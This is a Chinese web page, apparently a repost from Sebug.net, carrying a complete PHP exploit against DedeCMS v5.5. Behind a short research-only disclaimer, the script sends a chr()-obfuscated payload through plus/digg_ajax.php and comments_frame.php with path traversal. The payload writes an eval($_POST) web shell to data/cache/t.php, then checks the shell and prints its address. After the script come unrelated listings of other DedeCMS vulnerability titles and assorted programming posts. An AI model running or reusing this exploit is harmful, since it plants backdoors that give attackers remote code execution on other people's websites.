测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. <?php
    2. print_r('
    3. +----------------------------------------+
    4. dedecms v5.5 final getwebshell exploit
    5. +----------------------------------------+
    6. ');
    7. if($argc <3){
    8. print_r('
    9. +----------------------------------------+
    10. Usage: php '.$argv[0].' host path
    11. host: target server (ip/hostname)
    12. path: path to dedecms
    13. Example:
    14. php '.$argv[0].' localhost /dedecms/
    15. +----------------------------------------+
    16. ');
    17. exit;
    18. }
    19. error_reporting(7);
    20. ini_set('max_execution_time',0);
    21. $host = $argv[1];
    22. $path = $argv[2];
    23. $post_a ='plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(120).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*';
    24. $post_b ='needCode=aa/../../../data/mysql_error_trace';
    25. $shell ='data/cache/t.php';
    26. get_send($post_a);
    27. post_send('plus/comments_frame.php',$post_b);
    28. $content = post_send($shell,'t=echo tojen;');
    29. if(substr($content,9,3)=='200'){
    30. echo "\nShell Address is:".$host.$path.$shell;
    31. }else{
    32. echo "\nError.";
    33. }
    34. function get_send($url){
    35. global $host, $path;
    36. $message ="GET ".$path."$url HTTP/1.1\r\n";
    37. $message .="Accept: */*\r\n";
    38. $message .="Referer: http://$host$path\r\n";
    39. $message .="Accept-Language: zh-cn\r\n";
    40. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
    41. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    42. $message .="Host: $host\r\n";
    43. $message .="Connection: Close\r\n\r\n";
    44. $fp = fsockopen($host,80);
    45. if(!$fp){
    46. echo "\nConnect to host Error";
    47. }
    48. fputs($fp, $message);
    49. $back ='';
    50. while(!feof($fp))
    51. $back .= fread($fp,1024);
    52. fclose($fp);
    53. return $back;
    54. }
    55. function post_send($url,$cmd){
    56. global $host, $path;
    57. $message ="POST ".$path."$url HTTP/1.1\r\n";
    58. $message .="Accept: */*\r\n";
    59. $message .="Referer: http://$host$path\r\n";
    60. $message .="Accept-Language: zh-cn\r\n";
    61. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
    62. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    63. $message .="Host: $host\r\n";
    64. $message .="Content-Length: ".strlen($cmd)."\r\n";
    65. $message .="Connection: Close\r\n\r\n";
    66. $message .= $cmd;
    67. $fp = fsockopen($host,80);
    68. if(!$fp){
    69. echo "\nConnect to host Error";
    70. }
    71. fputs($fp, $message);
    72. $back ='';
    73. while(!feof($fp))
    74. $back .= fread($fp,1024);
    75. fclose($fp);
    76. return $back;
    77. }
    78. ?>

dedecms v5.5 final getwebshell exploit(datalistcp.class.php)的更多相关文章

  1. Dedecms <= V5.6 Final模板执行漏洞

    漏洞版本: Dedecms V5.6 Final 漏洞描述: Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上 ...

  2. DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞

    漏洞版本: DedeCms V5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板.网站升级转移均提供很大的便利,健壮的模板标签为 ...

  3. 为dedecms v5.7的ckeditor添加jwplayer插件

    dedecms v5.7的默认编辑器是ckeditor,不过用的是php版本的,默认的工具栏不在config.js里面配置,而是在ckeditor.inc.php里面配置,默认的工具栏是$toolba ...

  4. Dedecms v5.7包含上传漏洞利用

    Title:Dedecms v5.7包含上传漏洞利用 --2012-09-21 10:16 注册,登录,免邮箱验证. up.htm ---------------------------------- ...

  5. 织梦DedeCMS v5.7 实现导航条下拉菜单

    首先将下面这段代码贴到templets\default\footer.htm文件里(只要在此文件里就行,位置无所谓) <</span>script type='text/javasc ...

  6. CVE-2018-20129:DedeCMS V5.7 SP2前台文件上传漏洞

    一.漏洞摘要 漏洞名称: DedeCMS V5.7 SP2前台文件上传漏洞上报日期: 2018-12-11漏洞发现者: 陈灿华产品首页: http://www.dedecms.com/软件链接: ht ...

  7. DedeCMS V5.7 SP2前台文件上传漏洞(CVE-2018-20129)

    DedeCMS V5.7 SP2前台文件上传漏洞(CVE-2018-20129) 一.漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统.Dedecms V5.7 SP2版本中的 ...

  8. DedeCMS V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221)

    dedeCMS  V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221) 一.漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统.Dedecms V5.7 SP2 ...

  9. DeDeCMS v5.7 漏洞复现

    DedeCMS V5.7 漏洞复现 XSS漏洞 首先我们在首页要进行用户的注册以及登录 这里我们已经提前注册过了,登录即可 普通用户账号密码:root/passwd 管理员账号密码:admin/pik ...

随机推荐

  1. ServiceWorker pwa缓存

    index.js if ( navigator.serviceWorker ) { console.log("cache index") window.addEventListen ...

  2. shell-sed命令详解(转)

    (转自http://blog.csdn.net/wl_fln/article/details/7281986) Sed简介 sed是一种在线编辑器,它一次处理一行内容.处理时,把当前处理的行存储在临时 ...

  3. windows下运行命令行mysql,提示mysql不是内部命令,解决办法

    1. 打开CMD命令行,连接本地mysql数据库:mysql -u root -p 提示‘mysql’不是本地命令,解决办法如下: 找到你安装的mysql的目录,打开当前目录下的bin文件夹,你可以看 ...

  4. Wannafly挑战赛7 D - codeJan与青蛙

    codeJan喜欢观察世界.有一天,codeJan发现一个非常奇怪的现象.有一些年轻的青蛙聚集在一条直线上的某些位置上,同一个位置可能有多个青蛙.这些青蛙每次只会向前跳一米,并且每只青蛙每跳一次都会发 ...

  5. 湖南大学ACM程序设计新生杯大赛(同步赛)E - Permutation

    题目描述 A mod-dot product between two arrays with length n produce a new array with length n. If array ...

  6. 爱奇艺全国高校算法大赛初赛C

    区间$dp$. 倒着考虑这件事件,肯定有最后一个取走的数字,假设是$a[k]$,那么最后一次取走的价值肯定是$a[0]*a[k]*a[n+1]$,之前取走的价值和为$[1,k-1]$的价值加上$[k+ ...

  7. Python之路【第六篇】:模块与包

    目录 一 模块 3.1 import 3.2 from ... import... 3.3 把模块当做脚本执行 3.4 模块搜索路径 3.5 编译python文件 3.6  标准模块 3.7  dir ...

  8. 解决ubuntu解压windows生成的zip文件时乱码问题

    在windows上压缩的文件,是以系统默认编码中文来压缩文件.由于zip文件中没有声明其编码,所以linux上的unzip一般以默认编码解压,中文文件名会出现乱码. 虽然2005年就有人把这报告为bu ...

  9. 【WIN10】Bind、Binding與Converter的使用

    Demo源碼下載:http://yunpan.cn/cHuCmI4NK4xwr  访问密码 8201 1.Bind Bind的使用方式是: <Button Content="{x:Bi ...

  10. [AHOI2009]同类分布

    题目大意: 问在区间[l,r]内的正整数中,有多少数能被其个位数字之和整除. 思路: 数位DP. 极端情况下,每一位都是9,所以各位数字之和不超过9*18.(为了方便这里用了9*19) f[i][j] ...